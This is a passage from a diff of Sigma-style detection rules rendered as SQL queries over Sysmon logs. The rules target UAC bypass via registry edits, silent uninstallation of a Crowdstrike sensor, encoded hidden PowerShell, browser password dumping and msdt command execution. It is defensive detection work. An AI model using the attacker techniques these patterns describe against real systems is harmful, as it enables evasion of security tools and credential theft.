'%-GetCACAPS%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%reg%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%hkcu\\\\software\\\\classes\\\\ms-settings\\\\shell\\\\open\\\\command%' ESCAPE '\\' AND CommandLine LIKE '%/ve %' ESCAPE '\\' AND CommandLine LIKE '%/d%' ESCAPE '\\') OR (CommandLine LIKE '%reg%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%hkcu\\\\software\\\\classes\\\\ms-settings\\\\shell\\\\open\\\\command%' ESCAPE '\\' AND CommandLine LIKE '%/v%' 
ESCAPE '\\' AND CommandLine LIKE '%DelegateExecute%' ESCAPE '\\') OR (CommandLine LIKE '%reg%' ESCAPE '\\' AND CommandLine LIKE '%delete%' ESCAPE '\\' AND CommandLine LIKE '%hkcu\\\\software\\\\classes\\\\ms-settings%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_certoc_download.yml" + "filename": "proc_creation_win_reg_open_command.yml" }, { - "title": "LOLBIN From Abnormal Drive", - "id": "d4ca7c59-e9e4-42d8-bf57-91a776efcb87", + "title": "GfxDownloadWrapper.exe Downloads File from Suspicious URL", + "id": "eee00933-a761-4cd0-be70-c42fe91731e7", "status": "test", - "description": "Detects LOLBINs executing from an abnormal drive such as a mounted ISO.", - "author": "Christopher Peacock '@securepeacock', SCYTHE '@scythe_io'", + "description": "Detects when GfxDownloadWrapper.exe downloads file from non standard URL", + "author": "Victor Sergeev, oscd.community", "tags": [ - "attack.t1218.001" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ - "Rare false positives could occur on servers with multiple drives." 
+ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\calc.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\installutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmstp.exe' ESCAPE '\\') AND NOT ((CurrentDirectory LIKE '%C:\\\\%' ESCAPE '\\' OR CurrentDirectory = '') OR (CurrentDirectory = '')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\GfxDownloadWrapper.exe' ESCAPE '\\' AND NOT (CommandLine LIKE '%gameplayapi.intel.com%' ESCAPE '\\' AND (ParentImage LIKE '%\\\\GfxDownloadWrapper.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\igfxEM.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_not_from_c_drive.yml" + "filename": "proc_creation_win_lolbin_gfxdownloadwrapper_file_download.yml" }, { - "title": "Start Windows Service Via Net.EXE", - "id": "2a072a96-a086-49fa-bcb5-15cc5a619093", + "title": "Uninstall Crowdstrike Falcon Sensor", + "id": "f0f7be61-9cf5-43be-9836-99d6ef448a18", "status": "test", - "description": "Detects the usage of the \"net.exe\" command to start a service using the \"start\" flag", - "author": "Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community", + "description": "Adversaries may disable security tools to avoid possible detection of their tools and activities by uninstalling Crowdstrike Falcon", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1569.002" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Legitimate administrator or user executes a service for legitimate reasons." + "Administrator might leverage the same command line for debugging or other purposes. 
However this action must be always investigated" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) AND CommandLine LIKE '% start %' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\\\\WindowsSensor.exe%' ESCAPE '\\' AND CommandLine LIKE '% /uninstall%' ESCAPE '\\' AND CommandLine LIKE '% /quiet%' ESCAPE '\\')" ], - "filename": "proc_creation_win_net_start_service.yml" + "filename": "proc_creation_win_uninstall_crowdstrike_falcon.yml" }, { - "title": "Suspicious Schtasks From Env Var Folder", - "id": "81325ce1-be01-4250-944f-b4789644556f", - "status": "experimental", - "description": "Detects Schtask creations that point to a suspicious folder or an environment variable often used by malware", - "author": "Florian Roth (Nextron Systems)", + "title": "Windows Admin Share Mount Via Net.EXE", + "id": "3abd6094-7027-475f-9630-8ab9be7b9725", + "status": "test", + "description": "Detects when an admin share is mounted using net.exe", + "author": "oscd.community, Teymur Kheirkhabarov @HeirhabarovT, Zach Stanford @svch0st, wagga", "tags": [ - "attack.execution", - "attack.t1053.005" + "attack.lateral_movement", + "attack.t1021.002" ], "falsepositives": [ - "Benign scheduled tasks creations or executions that happen often during software installations", - "Software that uses the AppData folder and scheduled tasks to update the software in the AppData folders" + "Administrators" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '% /create %' ESCAPE '\\' AND (CommandLine LIKE '%\\%AppData\\%%' 
ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Perflogs%' ESCAPE '\\')) OR (ParentCommandLine LIKE '%\\\\svchost.exe -k netsvcs -p -s Schedule' ESCAPE '\\' AND (CommandLine LIKE '%\\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Perflogs%' ESCAPE '\\'))) AND NOT (((CommandLine LIKE '%update\\_task.xml%' ESCAPE '\\' OR CommandLine LIKE '%/Create /TN TVInstallRestore /TR%' ESCAPE '\\') OR ParentCommandLine LIKE '%unattended.ini%' ESCAPE '\\') OR (CommandLine LIKE '%/Create /Xml \"C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\.CR.%' ESCAPE '\\' AND CommandLine LIKE '%Avira\\_Security\\_Installation.xml%' ESCAPE '\\') OR (CommandLine LIKE '%/Create /F /TN%' ESCAPE '\\' AND CommandLine LIKE '%/Xml %' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\is-%' ESCAPE '\\' AND CommandLine LIKE '%Avira\\_%' ESCAPE '\\' AND (CommandLine LIKE '%.tmp\\\\UpdateFallbackTask.xml%' ESCAPE '\\' OR CommandLine LIKE '%.tmp\\\\WatchdogServiceControlManagerTimeout.xml%' ESCAPE '\\' OR CommandLine LIKE '%.tmp\\\\SystrayAutostart.xml%' ESCAPE '\\' OR CommandLine LIKE '%.tmp\\\\MaintenanceTask.xml%' ESCAPE '\\')) OR (CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '%/Create /TN \"klcp\\_update\" /XML %' ESCAPE '\\' AND CommandLine LIKE '%\\\\klcp\\_update\\_task.xml%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 
'net1.exe')) AND (CommandLine LIKE '% use %' ESCAPE '\\' AND CommandLine LIKE '% \\\\%\\\\%$%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_schtasks_env_folder.yml" + "filename": "proc_creation_win_net_use_mount_admin_share.yml" }, { - "title": "Suspicious Reconnaissance Activity Via GatherNetworkInfo.VBS", - "id": "07aa184a-870d-413d-893a-157f317f6f58", - "status": "test", - "description": "Detects execution of the built-in script located in \"C:\\Windows\\System32\\gatherNetworkInfo.vbs\". Which can be used to gather information about the target machine", + "title": "Suspicious New Instance Of An Office COM Object", + "id": "9bdaf1e9-fdef-443b-8081-4341b74a7e28", + "status": "experimental", + "description": "Detects an svchost process spawning an instance of an office application. This happens when the initial word application creates an instance of one of the Office COM objects such as 'Word.Application', 'Excel.Application', etc.\nThis can be used by malicious actors to create malicious Office documents with macros on the fly. 
(See vba2clr project in the references)\n", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.discovery", "attack.execution", - "attack.t1615", - "attack.t1059.005" + "attack.defense_evasion" ], "falsepositives": [ - "Unknown" + "Legitimate usage of office automation via scripting" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND CommandLine LIKE '%gatherNetworkInfo.vbs%' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\svchost.exe' ESCAPE '\\' AND (Image LIKE '%\\\\winword.exe' ESCAPE '\\' OR Image LIKE '%\\\\excel.exe' ESCAPE '\\' OR Image LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR Image LIKE '%\\\\msaccess.exe' ESCAPE '\\' OR Image LIKE '%\\\\mspub.exe' ESCAPE '\\' OR Image LIKE '%\\\\eqnedt32.exe' ESCAPE '\\' OR Image LIKE '%\\\\visio.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_gather_network_info_execution.yml" + "filename": "proc_creation_win_office_svchost_parent.yml" }, { - "title": "Suspicious RazerInstaller Explorer Subprocess", - "id": "a4eaf250-7dc1-4842-862a-5e71cd59a167", + "title": "UAC Bypass Using Consent and Comctl32 - Process", + "id": "1ca6bd18-0ba0-44ca-851c-92ed89a61085", "status": "test", - "description": "Detects a explorer.exe sub process of the RazerInstaller software which can be invoked from the installer to select a different installation folder but can also be exploited to escalate privileges to LOCAL SYSTEM", - "author": "Florian Roth (Nextron Systems), Maxime Thiebaut", + "description": "Detects the pattern of UAC Bypass using consent.exe and comctl32.dll (UACMe 22)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ + "attack.defense_evasion", "attack.privilege_escalation", - "attack.t1553" + 
"attack.t1548.002" ], "falsepositives": [ - "User selecting a different installation folder (check for other sub processes of this explorer.exe process)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\RazerInstaller.exe' ESCAPE '\\' AND IntegrityLevel = 'System') AND NOT (Image LIKE 'C:\\\\Windows\\\\Installer\\\\Razer\\\\Installer\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\consent.exe' ESCAPE '\\' AND Image LIKE '%\\\\werfault.exe' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" ], - "filename": "proc_creation_win_exploit_other_razorinstaller_lpe.yml" + "filename": "proc_creation_win_uac_bypass_consent_comctl32.yml" }, { - "title": "Potential Meterpreter/CobaltStrike Activity", - "id": "15619216-e993-4721-b590-4c520615a67d", + "title": "Malicious Base64 Encoded PowerShell Keywords in Command Lines", + "id": "f26c6093-6f14-4b12-800f-0fcb46f5ffd0", "status": "test", - "description": "Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service starting", - "author": "Teymur Kheirkhabarov, Ecco, Florian Roth", + "description": "Detects base64 encoded strings used in hidden malicious PowerShell command lines", + "author": "John Lambert (rule)", "tags": [ - "attack.privilege_escalation", - "attack.t1134.001", - "attack.t1134.002" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Commandlines containing components like cmd accidentally", - "Jobs and services started with cmd" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\services.exe' ESCAPE '\\' AND ((CommandLine LIKE '%/c%' ESCAPE '\\' AND CommandLine LIKE '%echo%' ESCAPE '\\' AND CommandLine LIKE '%\\\\pipe\\\\%' ESCAPE 
'\\' AND (CommandLine LIKE '%cmd%' ESCAPE '\\' OR CommandLine LIKE '%\\%COMSPEC\\%%' ESCAPE '\\')) OR (CommandLine LIKE '%rundll32%' ESCAPE '\\' AND CommandLine LIKE '%.dll,a%' ESCAPE '\\' AND CommandLine LIKE '%/p:%' ESCAPE '\\'))) AND NOT ((CommandLine LIKE '%MpCmdRun%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND CommandLine LIKE '% hidden %' ESCAPE '\\' AND (CommandLine LIKE '%AGkAdABzAGEAZABtAGkAbgAgAC8AdAByAGEAbgBzAGYAZQByA%' ESCAPE '\\' OR CommandLine LIKE '%aXRzYWRtaW4gL3RyYW5zZmVy%' ESCAPE '\\' OR CommandLine LIKE '%IAaQB0AHMAYQBkAG0AaQBuACAALwB0AHIAYQBuAHMAZgBlAHIA%' ESCAPE '\\' OR CommandLine LIKE '%JpdHNhZG1pbiAvdHJhbnNmZX%' ESCAPE '\\' OR CommandLine LIKE '%YgBpAHQAcwBhAGQAbQBpAG4AIAAvAHQAcgBhAG4AcwBmAGUAcg%' ESCAPE '\\' OR CommandLine LIKE '%Yml0c2FkbWluIC90cmFuc2Zlc%' ESCAPE '\\' OR CommandLine LIKE '%AGMAaAB1AG4AawBfAHMAaQB6AGUA%' ESCAPE '\\' OR CommandLine LIKE '%JABjAGgAdQBuAGsAXwBzAGkAegBlA%' ESCAPE '\\' OR CommandLine LIKE '%JGNodW5rX3Npem%' ESCAPE '\\' OR CommandLine LIKE '%QAYwBoAHUAbgBrAF8AcwBpAHoAZQ%' ESCAPE '\\' OR CommandLine LIKE '%RjaHVua19zaXpl%' ESCAPE '\\' OR CommandLine LIKE '%Y2h1bmtfc2l6Z%' ESCAPE '\\' OR CommandLine LIKE '%AE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4A%' ESCAPE '\\' OR CommandLine LIKE '%kATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8Abg%' ESCAPE '\\' OR CommandLine LIKE '%lPLkNvbXByZXNzaW9u%' ESCAPE '\\' OR CommandLine LIKE '%SQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuA%' ESCAPE '\\' OR CommandLine LIKE '%SU8uQ29tcHJlc3Npb2%' ESCAPE '\\' OR CommandLine LIKE '%Ty5Db21wcmVzc2lvb%' ESCAPE '\\' OR CommandLine LIKE '%AE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQ%' ESCAPE '\\' OR CommandLine LIKE '%kATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtA%' ESCAPE '\\' OR CommandLine LIKE '%lPLk1lbW9yeVN0cmVhb%' ESCAPE '\\' OR CommandLine LIKE 
'%SQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0A%' ESCAPE '\\' OR CommandLine LIKE '%SU8uTWVtb3J5U3RyZWFt%' ESCAPE '\\' OR CommandLine LIKE '%Ty5NZW1vcnlTdHJlYW%' ESCAPE '\\' OR CommandLine LIKE '%4ARwBlAHQAQwBoAHUAbgBrA%' ESCAPE '\\' OR CommandLine LIKE '%5HZXRDaHVua%' ESCAPE '\\' OR CommandLine LIKE '%AEcAZQB0AEMAaAB1AG4Aaw%' ESCAPE '\\' OR CommandLine LIKE '%LgBHAGUAdABDAGgAdQBuAGsA%' ESCAPE '\\' OR CommandLine LIKE '%LkdldENodW5r%' ESCAPE '\\' OR CommandLine LIKE '%R2V0Q2h1bm%' ESCAPE '\\' OR CommandLine LIKE '%AEgAUgBFAEEARABfAEkATgBGAE8ANgA0A%' ESCAPE '\\' OR CommandLine LIKE '%QASABSAEUAQQBEAF8ASQBOAEYATwA2ADQA%' ESCAPE '\\' OR CommandLine LIKE '%RIUkVBRF9JTkZPNj%' ESCAPE '\\' OR CommandLine LIKE '%SFJFQURfSU5GTzY0%' ESCAPE '\\' OR CommandLine LIKE '%VABIAFIARQBBAEQAXwBJAE4ARgBPADYANA%' ESCAPE '\\' OR CommandLine LIKE '%VEhSRUFEX0lORk82N%' ESCAPE '\\' OR CommandLine LIKE '%AHIAZQBhAHQAZQBSAGUAbQBvAHQAZQBUAGgAcgBlAGEAZA%' ESCAPE '\\' OR CommandLine LIKE '%cmVhdGVSZW1vdGVUaHJlYW%' ESCAPE '\\' OR CommandLine LIKE '%MAcgBlAGEAdABlAFIAZQBtAG8AdABlAFQAaAByAGUAYQBkA%' ESCAPE '\\' OR CommandLine LIKE '%NyZWF0ZVJlbW90ZVRocmVhZ%' ESCAPE '\\' OR CommandLine LIKE '%Q3JlYXRlUmVtb3RlVGhyZWFk%' ESCAPE '\\' OR CommandLine LIKE '%QwByAGUAYQB0AGUAUgBlAG0AbwB0AGUAVABoAHIAZQBhAGQA%' ESCAPE '\\' OR CommandLine LIKE '%0AZQBtAG0AbwB2AGUA%' ESCAPE '\\' OR CommandLine LIKE '%1lbW1vdm%' ESCAPE '\\' OR CommandLine LIKE '%AGUAbQBtAG8AdgBlA%' ESCAPE '\\' OR CommandLine LIKE '%bQBlAG0AbQBvAHYAZQ%' ESCAPE '\\' OR CommandLine LIKE '%bWVtbW92Z%' ESCAPE '\\' OR CommandLine LIKE '%ZW1tb3Zl%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_meterpreter_getsystem.yml" + "filename": "proc_creation_win_powershell_hidden_b64_cmd.yml" }, { - "title": "Use of OpenConsole", - "id": "814c95cc-8192-4378-a70a-f1aafd877af1", + "title": "PUA - WebBrowserPassView Execution", + "id": "d0dae994-26c6-4d2d-83b5-b3c8b79ae513", "status": "experimental", - "description": "Detects usage of OpenConsole binary as a 
LOLBIN to launch other binaries to bypass application Whitelisting", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the execution of WebBrowserPassView.exe. A password recovery tool that reveals the passwords stored by the following Web browsers, Internet Explorer (Version 4.0 - 11.0), Mozilla Firefox (All Versions), Google Chrome, Safari, and Opera", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1059" + "attack.credential_access", + "attack.t1555.003" ], "falsepositives": [ - "Legitimate use by an administrator" + "Legitimate use" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'OpenConsole.exe' OR Image LIKE '%\\\\OpenConsole.exe' ESCAPE '\\') AND NOT (Image LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\Microsoft.WindowsTerminal%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Description = 'Web Browser Password Viewer' OR Image LIKE '%\\\\WebBrowserPassView.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_openconsole.yml" + "filename": "proc_creation_win_pua_webbrowserpassview.yml" }, { - "title": "Local Accounts Discovery", - "id": "502b42de-4306-40b4-9596-6f590c81f073", - "status": "test", - "description": "Local accounts, System Owner/User discovery using operating systems utilities", - "author": "Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community", + "title": "Potential Arbitrary Command Execution Using Msdt.EXE", + "id": "258fc8ce-8352-443a-9120-8a11e4857fa5", + "status": "experimental", + "description": "Detects processes leveraging the \"ms-msdt\" handler or the \"msdt.exe\" binary to execute arbitrary commands as seen in the follina (CVE-2022-30190) vulnerability", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1033", - "attack.t1087.001" + 
"attack.defense_evasion", + "attack.t1202" ], "falsepositives": [ - "Legitimate administrator or user enumerates local users for legitimate reason" + "Unknown" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '% /c%' ESCAPE '\\' AND CommandLine LIKE '%dir %' ESCAPE '\\' AND CommandLine LIKE '%\\\\Users\\\\%' ESCAPE '\\') AND NOT (CommandLine LIKE '% rmdir %' ESCAPE '\\')) OR (((Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\') AND CommandLine LIKE '%user%' ESCAPE '\\') AND NOT ((CommandLine LIKE '%/domain%' ESCAPE '\\' OR CommandLine LIKE '%/add%' ESCAPE '\\' OR CommandLine LIKE '%/delete%' ESCAPE '\\' OR CommandLine LIKE '%/active%' ESCAPE '\\' OR CommandLine LIKE '%/expires%' ESCAPE '\\' OR CommandLine LIKE '%/passwordreq%' ESCAPE '\\' OR CommandLine LIKE '%/scriptpath%' ESCAPE '\\' OR CommandLine LIKE '%/times%' ESCAPE '\\' OR CommandLine LIKE '%/workstations%' ESCAPE '\\'))) OR (Image LIKE '%\\\\whoami.exe' ESCAPE '\\' OR Image LIKE '%\\\\quser.exe' ESCAPE '\\' OR Image LIKE '%\\\\qwinsta.exe' ESCAPE '\\') OR (Image LIKE '%\\\\wmic.exe' ESCAPE '\\' AND CommandLine LIKE '%useraccount%' ESCAPE '\\' AND CommandLine LIKE '%get%' ESCAPE '\\') OR (Image LIKE '%\\\\cmdkey.exe' ESCAPE '\\' AND CommandLine LIKE '% /l%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\msdt.exe' ESCAPE '\\' OR OriginalFileName = 'msdt.exe') AND (CommandLine LIKE '%IT\\_BrowseForFile=%' ESCAPE '\\' OR (CommandLine LIKE '% PCWDiagnostic%' ESCAPE '\\' AND (CommandLine LIKE '% /af %' ESCAPE '\\' OR CommandLine LIKE '% -af %' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_susp_local_system_owner_account_discovery.yml" + "filename": "proc_creation_win_msdt_arbitrary_command_execution.yml" }, { - "title": 
"CobaltStrike Load by Rundll32", - "id": "ae9c6a7c-9521-42a6-915e-5aaa8689d529", + "title": "Application Whitelisting Bypass via Bginfo", + "id": "aaf46cdc-934e-4284-b329-34aa701e3771", "status": "test", - "description": "Rundll32 can be use by Cobalt Strike with StartW function to load DLLs from the command line.", - "author": "Wojciech Lesicki", + "description": "Execute VBscript code that is referenced within the *.bgi file.", + "author": "Beyu Denis, oscd.community", "tags": [ + "attack.execution", + "attack.t1059.005", "attack.defense_evasion", - "attack.t1218.011" + "attack.t1218", + "attack.t1202" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE' OR (CommandLine LIKE '%rundll32.exe%' ESCAPE '\\' OR CommandLine LIKE '%rundll32 %' ESCAPE '\\')) AND (CommandLine LIKE '%.dll%' ESCAPE '\\' AND (CommandLine LIKE '% StartW' ESCAPE '\\' OR CommandLine LIKE '%,StartW' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\bginfo.exe' ESCAPE '\\' AND CommandLine LIKE '%/popup%' ESCAPE '\\' AND CommandLine LIKE '%/nolicprompt%' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_cobaltstrike_load_by_rundll32.yml" + "filename": "proc_creation_win_lolbin_bginfo.yml" }, { - "title": "Renamed Remote Utilities RAT (RURAT) Execution", - "id": "9ef27c24-4903-4192-881a-3adde7ff92a5", - "status": "experimental", - "description": "Detects execution of renamed Remote Utilities (RURAT) via Product PE header field", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "New Firewall Rule Added Via Netsh.EXE", + "id": "cd5cfd80-aa5f-44c0-9c20-108c4ae12e3c", + "status": "test", + "description": "Detects the addition of a new rule to the Windows firewall via netsh", + 
"author": "Markus Neis, Sander Wiebing", "tags": [ "attack.defense_evasion", - "attack.collection", - "attack.command_and_control", - "attack.discovery", - "attack.s0592" + "attack.t1562.004" ], "falsepositives": [ - "Unknown" + "Legitimate administration activity", + "Software installations and removal" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Product = 'Remote Utilities' AND NOT ((Image LIKE '%\\\\rutserv.exe' ESCAPE '\\' OR Image LIKE '%\\\\rfusclient.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND (CommandLine LIKE '% firewall %' ESCAPE '\\' AND CommandLine LIKE '% add %' ESCAPE '\\')) AND NOT (((CommandLine LIKE '%\\\\netsh.exe advfirewall firewall add rule name=Dropbox dir=in action=allow \"program=C:\\\\Program Files (x86)\\\\Dropbox\\\\Client\\\\Dropbox.exe\" enable=yes profile=Any%' ESCAPE '\\' OR CommandLine LIKE '%\\\\netsh.exe advfirewall firewall add rule name=Dropbox dir=in action=allow \"program=C:\\\\Program Files\\\\Dropbox\\\\Client\\\\Dropbox.exe\" enable=yes profile=Any%' ESCAPE '\\')) OR (ParentImage LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' AND ParentImage LIKE '%\\\\thor64.exe' ESCAPE '\\' AND CommandLine LIKE '%advfirewall firewall show rule name=all%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_renamed_rurat.yml" + "filename": "proc_creation_win_netsh_fw_add_rule.yml" }, { - "title": "IIS Native-Code Module Command Line Installation", - "id": "9465ddf4-f9e4-4ebd-8d98-702df3a93239", + "title": "Ping Hex IP", + "id": "1a0d4aba-7668-4365-9ce4-6d79ab088dfd", "status": "test", - "description": "Detects suspicious IIS native-code module installations via command line", + "description": "Detects a ping command that uses a hex encoded IP address", "author": "Florian Roth 
(Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1505.003" + "attack.defense_evasion", + "attack.t1140", + "attack.t1027" ], "falsepositives": [ - "Unknown as it may vary from organisation to organisation how admins use to install IIS modules" + "Unlikely, because no sane admin pings IP addresses in a hexadecimal form" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\appcmd.exe' ESCAPE '\\' OR OriginalFileName = 'appcmd.exe') AND (CommandLine LIKE '%install%' ESCAPE '\\' AND CommandLine LIKE '%module%' ESCAPE '\\' AND (CommandLine LIKE '%/name:%' ESCAPE '\\' OR CommandLine LIKE '%-name:%' ESCAPE '\\'))) AND NOT ((ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\inetsrv\\\\iissetup.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\ping.exe' ESCAPE '\\' AND CommandLine LIKE '%0x%' ESCAPE '\\')" ], - "filename": "proc_creation_win_iis_appcmd_susp_module_install.yml" + "filename": "proc_creation_win_ping_hex_ip.yml" }, { - "title": "MSHTA Suspicious Execution 01", - "id": "cc7abbd0-762b-41e3-8a26-57ad50d2eea3", - "status": "test", - "description": "Detection for mshta.exe suspicious execution patterns sometimes involving file polyglotism", - "author": "Diego Perez (@darkquassar), Markus Neis, Swisscom (Improve Rule)", + "title": "SyncAppvPublishingServer VBS Execute Arbitrary PowerShell Code", + "id": "36475a7d-0f6d-4dce-9b01-6aeb473bbaf1", + "status": "experimental", + "description": "Executes arbitrary PowerShell code using SyncAppvPublishingServer.vbs", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1140", - "attack.t1218.005", - "attack.execution", - "attack.t1059.007", - "cve.2020.1599" + "attack.t1218", + "attack.t1216" ], "falsepositives": [ - "False positives depend on scripts and administrative tools used in the 
